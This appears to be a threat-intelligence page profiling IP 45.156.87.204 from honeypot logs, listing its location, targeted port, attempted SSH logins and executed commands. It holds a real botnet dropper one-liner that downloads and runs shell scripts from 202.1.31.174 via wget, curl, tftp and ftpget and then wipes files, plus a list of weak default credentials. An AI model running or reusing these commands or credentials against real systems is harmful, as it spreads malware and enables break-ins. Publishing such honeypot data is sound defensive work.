Active Threat: MEDIUM

45.156.87.204

Country of Origin: 🇳🇱 Netherlands
First Detected: 8/1/2026
Last Activity: 12/1/2026
ISP: Pfcloud UG (haftungsbeschrankt)
Total Attacks: 573
Ports: 2
Attack Types: 1
Malware: 4

Geolocation

Country: 🇳🇱 Netherlands
City: Eygelshoven
ASN: AS51396
ISP: Pfcloud UG (haftungsbeschrankt)

Attack Types

cowrie

Attacked Ports

2223

Associated Malware

Attempted Credentials

🔐root/root
9x
🔐root/admin
5x
🔐root/(empty)
4x
🔐root/icatch99
3x
🔐root/admin12345
2x
🔐admin/admin
2x
🔐user/user
2x
🔐root/root123
2x
🔐root/root12345
1x
🔐root/HH@123
1x
🔐admin/system
1x
🔐root/GG@123
1x
🔐root/EE@123
1x
🔐root/86981198
1x
🔐admin/anko
1x

Executed Commands

$ echo cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://202.1.31.174/1.sh; curl -O http://202.1.31.174/1.sh; chmod 777 1.sh; sh 1.sh; tftp 202.1.31.174 -c get 1.sh; chmod 777 1.sh; sh 1.sh; tftp -r 3.sh -g 202.1.31.174; chmod 777 3.sh; sh 3.sh; ftpget -v -u anonymous -p anonymous -P 21 202.1.31.174 2.sh 2.sh; sh 2.sh; rm -rf 1.sh 1.sh 3.sh 2.sh; rm -rf *
3x
$ cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://202.1.31.174/1.sh; curl -O http://202.1.31.174/1.sh; chmod 777 1.sh; sh 1.sh; tftp 202.1.31.174 -c get 1.sh; chmod 777 1.sh; sh 1.sh; tftp -r 3.sh -g 202.1.31.174; chmod 777 3.sh; sh 3.sh; ftpget -v -u anonymous -p anonymous -P 21 202.1.31.174 2.sh 2.sh; sh 2.sh; rm -rf 1.sh 1.sh 3.sh 2.sh; rm -rf *
2x
$ ssh -V
1x
$ history | tail -5
1x

Risk Assessment

57/100
Low / Medium / High / Critical